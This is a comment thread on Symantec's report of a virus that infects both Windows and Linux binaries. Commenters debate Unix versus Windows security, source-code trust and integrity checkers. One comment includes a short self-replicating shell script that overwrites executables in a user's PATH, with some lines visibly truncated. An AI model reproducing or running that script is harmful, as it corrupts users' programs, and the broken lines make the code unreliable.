Win32/Linux Cross-Platform Virus 582
An Anonymous Coward writes "Symantec reports on the first virus to infect both ELF and PE binaries on Linux and Win32. "The first Win32/Linux cross-infector, {Win32,Linux}/Peelf, uses two separate routines to carry out the infection on PE and ELF files. This variant of Simile shares a substantial amount of code between the two infection functions, such as the polymorphic/metamorphic engines, the only platform-specific parts being the directory traversal code and the API usage.""
Re:why i love my mac (Score:1, Insightful)
Re:Use the source Luke! (Score:5, Insightful)
Grabbing source and make installing it is about the same as grabbing a binary, as far as security goes. You just don't know what's in there.
More proof (Score:4, Insightful)
I think that this was cooked up in Symantec's labs in order to scare people & possibly serve as an ad for their software, especially if they have a "solution" that runs on Linux.
Re:Use the source Luke! (Score:2, Insightful)
Re:One more reason... (Score:4, Insightful)
Re:Use the source Luke! (Score:5, Insightful)
You forgot to include "and completely understand" in the above quotation.
We all know (I'm sure) that the function of a routine isn't always obvious. And especially if someone is trying to hide a routine, the functionality could be made very un-obvious.
A complete source code audit for any major application would be far more labourious than any individual would have the time to undertake in most circumstances.
Re:Use the source Luke! (Score:3, Insightful)
So, how the infection... (Score:2, Insightful)
Infected win executables run on windows, ELF executables run under linux.. I don't think there are that many programs crossing the wall between the two platforms.
But probably i'm forgetting about wine, vmware and dual-boot machines
Re:Use the source Luke! (Score:3, Insightful)
And why worry about downloading binaries? Even if you don't scan them for viruses, others do.
Re:How to scan Linux (Score:3, Insightful)
You do what you should be doing anyway. You run tripwire [tripwire.com] or AIDE [cs.tut.fi]. There is a free version of tripwire for linux, it probably came with your distribution. It *is* a slight pain to setup, mostly because of things like logrotated, but well worth the pain. AIDE I have no experience with because I am satisfied with tripwire. They both do effectively the same thing.
These products don't just "scan for virii", they check that the system is in the state you think it is in. If the system changes, you get a notification saying exactly what changed.
This lets you know if your box has been compromised, or infected, or even if the hard drive is starting to flake out.
Running tripwire/AIDE is just a good thing.
Re:One more reason... (Score:5, Insightful)
There is no difference as far as I'm concerned as losing my entire system or losing my home directory. You're right that at least if you don't use the root account to catch the virus only your own files would be destroyed but really the files in my home directory are the only files that I care about getting destroyed.
It only takes me about 10-15 minutes the get my system back up if I had to reinstall. It's all my personal files that can't be replaced that would make the experience traumatic.
--
Garett
Re:One more reason... (Score:3, Insightful)
typical Linux user
The problem here is that virii are spread the most by the least knowledgable. I've seen people "try out that Lye-nucks thing" and just cruise around as root. The don't know that it's insecure, just as they don't know not to open up attachments from friends. A typical Linux user may limit his or her damage, but a newbie can do a hell of a lot more damage using Linux than using MacOS.
Re:More proof (Score:4, Insightful)
I think you've got a good point. To quote Symantec:
"So far Symantec has not received any submissions of this virus from customers."
For any OS, there will always be code which, when run with the appropriate privileges, can cause some damage. That's why viruses are mainly a social problem. Just to prove how pointless this all is, here's my first simple-minded attempt a writing a Linux virus:
#!/bin/sh
(
for file in `find \`echo $PATH | sed 's/:/
if [ -x $file -a -w `dirname $file` -a ! -e `dirname $file`/.`basename $file`.orig ] ; then
mv -f $file `dirname $file`/.`basename $file`.orig && cp -f $0 $file
fi
done
) >
echo '1 4m 4 rh347 h4x0r! ph33r my b45H s|<|11z!'
[ -x `dirname $0`/.`basename $0`.orig ] && \
exec `dirname $0`/.`basename $0`.orig "$@"
ta-da! a trivial example of a "virus" that "infects" all executables in a user's PATH, and works even on non-x86 machines and UNIX machines with shellutils installed (with a little sed work, even that requirement could be removed).
What does this prove? Nothing. Neither does this Simile virus, until it starts mailing itself to people and popular Linux email clients start automatically executing attachments in the preview pane.
Of course, with all the idiots I see sending out mail as root, maybe this isn't too far off.
A True Test (Score:4, Insightful)
A lot of people have said Linux has fewer viruses than Windows only because Linux isn't as widely used... Well, this is the chance to do some comparisons. How devastating is the cross-platform virus to each system, and how fast does it spread on each?
Also note that it's a virus, not a security hole or flaw in the system - this doesn't make Linux less secure like a Melissa-type problem that takes advantage of holes made by one company's stupid software bundling decisions.
here's a scary thought... (Score:5, Insightful)
Re:Use the source Luke! (Score:3, Insightful)
Not hardly. Look at how something like Klez works..it can infect a system through vulnerabilities in Web browsers if you check your e-mail through a Web interface. It's only a matter of time until viruses and worms with similar abilities move to Linux and OS X. The only reason they haven't done so yet isn't superior security, it's the fact that Windows systems are the best targets since there are so many. Why infect a few Linux boxen when you can infect tens or hundreds of thousands of Windows machines with the same effort?
Re:how to infect your linux box (Score:3, Insightful)
There is one distribution where users are always logged in as root. It is called Lindows. In one of the reviews (search old articles on /.) they were actually able to run Outlook viruses and other Microsoft transmitted diseases on Lindows!
But yeah, you are exactly right about security of Unix vs. Windows. On Unix, regular users are simply incapable of infecting the system even if they wanted to. Windows, however, is stuck in the single-user mentality. It's really a shame cause NT does have filesystem-level security and theoretically, it could be just as secure as Unix. The problem is that most applications *expect* to have complete access to the system, making a locked-down NT largely useless. Everywhere I worked, all the users have Administrator access on their local machine, and always run executable attachments (well, the ones that don't execute automatically that is :-)
Re:Use the source Luke! (Score:3, Insightful)
I don't either, but the mere fact that the source code is available makes the author trustworthy in my opinion. The mindset of OSS developers is to help out and show off (I should know, as I am one). The last thing a free software author would ever do is try to compromise your system. Especially if you're trying to build a reputation, why ruin it? Do you honestly think, for example, that David Faure of KDE would put something harmful into the next release? Or Linus would try to slip something devastating into the kernel? I would bet money this would never happen.
These developers work their asses off for the community and keep their code open. No need for me to personally read any of it. They already get 10x my trust by their actions.
Re:Use the source Luke! (Score:4, Insightful)
In case you were wondering, he's posting from a machine running the Linux kernel, version 1.1, which he just recently finished checking.
In a bitter case of irony, I screwed with his compiler to make that kernel bundle in a trojan.
When will the patches be out? (Score:4, Insightful)
Now if only MS would release Outlook for Linux... (Score:3, Insightful)
Re:One more reason... (Score:2, Insightful)
Re:Do antivirus companies write viruses? No. (Score:5, Insightful)
At worst?
Destroying data files isn't what you should worry about; as you pointed out, that's easy to fix.
Far more worrying is a virus that makes minor changes to your data files. And how long will it be before you notice? And how old a backup will you restore?
Re:Do antivirus companies write viruses? No. (Score:3, Insightful)
Sure, like the final length of a virus reflects its complexity or difficulty at all. Ever enter, or even hear about, the obfuscated C contest? Getting a functional program in a small footprint is generally harder than producing a bloated monstrosity.
Just ask Microsoft.
Re:Use the source Luke! (Score:3, Insightful)
True for round one. Most everybody.
Round two. There's always somebody that's gotta do things differently, and the nasty runs into some kind of incompatability. A few paranoid souls run diff on previous versions. Any hint of something nasty and the nasty gets a swarm of unwanted attention.
Round three. However it happened, somebody is gonna make pretty damn sure it doesn't happen again, kinda embarrasing.
Re:Do antivirus companies write viruses? No. (Score:5, Insightful)
To most people, there's no difference whatsoever.
To AV folks, a worm is just a particular subset of the class of viruses.
Klez, the number one virus today, is a worm. I haven't checked the numbers, but right now, I'm guessing that email accounts for 99% of virus (i.e., worm) transmission. And I'd guess that the majority of in-the-wild viruses today, are worms.
How could a virus get widespread on Unix? First, you have to drop the assumption that all Unix users are sophisticated
the average user today.
And when Mr Average User is running his point-and-click email system on Gnome, and a known and trusted friend (spoofed address) sends him "Funny Joke" or "Useful Program" the likelihood of him clicking on it is just as great whatever OS he's running.
OK, clicking on it won't work, it's 0644. Or will it be? And does it matter if it's 0644, maybe it can still get executed?
I haven't tried to write a virus (see my original posting), but you can be sure that whenever AV folks get together and have a few beers (beer is crucial to the AV industry) one of the subjects that comes up is "what if?". And we talk about techniques for writing interesting and difficult-to-handle viruses. This speculation is useful, of course, it makes us think ahead. Well, that's how it was a few years ago, I guess it's the same now.
So, let's speculate a little (and I haven't tested any of these ideas with any mailers or Linux UIs).
What if you emailed a tar file, and the mailer is set to untar it (AOL has a neat feature, when someone receives a zip file, AOL automatically unzips it)? Now you have a 755 file, right? User executable - now all you need to do is persuade the user to click on it, which has never been a difficulty. "Click here".
Or how about your suggestion. Persuade the user to open a terminal window and type perl funnyjoke. Mr Average User really doesn't understand the consequences of doing that, especially when the original email came from a trusted source (or so he thought). It doesn't feel to him like he's bypassing a security system. I mean, what kind of security system is it that can be bypassed so easily?
Or how about this. In the user's home directory, there's
The distinction between executable and non-executable isn't as black and white as one might have thought.
Now consider Word (and Office in general). A lot of people have opined that the non-existence of a good Linux Word-compatible program is one of the barriers to Linux acceptance in the corporate world. So, suppose someone made such a clone. Now you have the whole macro-execution thing to worry about. Users get emailed a document written in Word for Windows; the macros also work under Linux, because the platform is Word, not Windows or Linux. Word for Windows macros work just fine on Word for Mac (at least, they did a few years ago, things might have changed since I was current, but I doubt it).
And Jane User has write access to all her own documents. And then emails one to a colleague
Now, what about us sophisticated folks, how could we get hit by a virus?
Well, I don't know about you, but when I download and compile a tarball, I don't actually read through megabytes of source code looking for a self-replicator. I trust the source. I guess almost everyone does the same. And what is the source? Well, I trust RedHat CDs, I trust the Red Hat web site almost as much (assuming no sneaky
DNS spoofing
OK, so the RedHat site is OK, but I also go to DaveCentral, and Freshmeat, and SourceForge, and the CGI Resource, and I follow links from there to the web site that the software came from
In other words, I get software from *all over*, and I'd guess that other folks do too.
And your point is that *you* get to make the decision about who to trust; my point is that Mr Average User gets that *badly* wrong, and I will too, sometimes. It's a balance. I *really want* this program that synchronises my system clocks, and the site I got it from certainly looks OK, I mean, all the words are spelled pretty much right and there's not a single "31334" there.
And we all know, you can't have a virus on Linux, so I don't actually have to be the least bit careful, right? Wrong.
"I'm not worried about viruses"
I agree, you don't have to be worried. But I'd suggest that you be at least a little bit *careful*.
So, why should you care if Mr Average user hoses his data?
A) because you're his tech support person, and you're the one he'll complain to
B) because he's now sending worms to everyone else on the subnet, because that's that this worm does
C) because some worms choose a random file to mail out, and that can be *really embarrassing*.
On your final point about virus scanners; you're assuming that a heuristic searches for unlink; I doubt if any heuristics do that. I personally never wrote a heuristic (it wasn't needed when I was in the game), but I know folks who wrote the ones that are in scanners that are in very common use today, and I remember one of them telling me about one of the heuristics in the scanner for Word viruses, and it was looking for something I'd never heard of, that was to do with copying macros. You don't look for the damage routine, you look for the self-copying routine. And there's probably a lot more on heuristics; like I said, I never wrote one, so I don't know.
It is *trivially easy* to write a virus that today's scanners can't detect. A scanner is looking for a particular bunch of things; all you need to do is keep changing your virus until the scanner doesn't detect it any more.
And you don't need to be knowledgable to write a virus. A virus is just a program that copies itself. You could write that in perl in not many minutes. Add the code to look for another
Today, there isn't a significant virus problem in Linux. I hope it stays that way.
Re:Do antivirus companies write viruses? No. (Score:2, Insightful)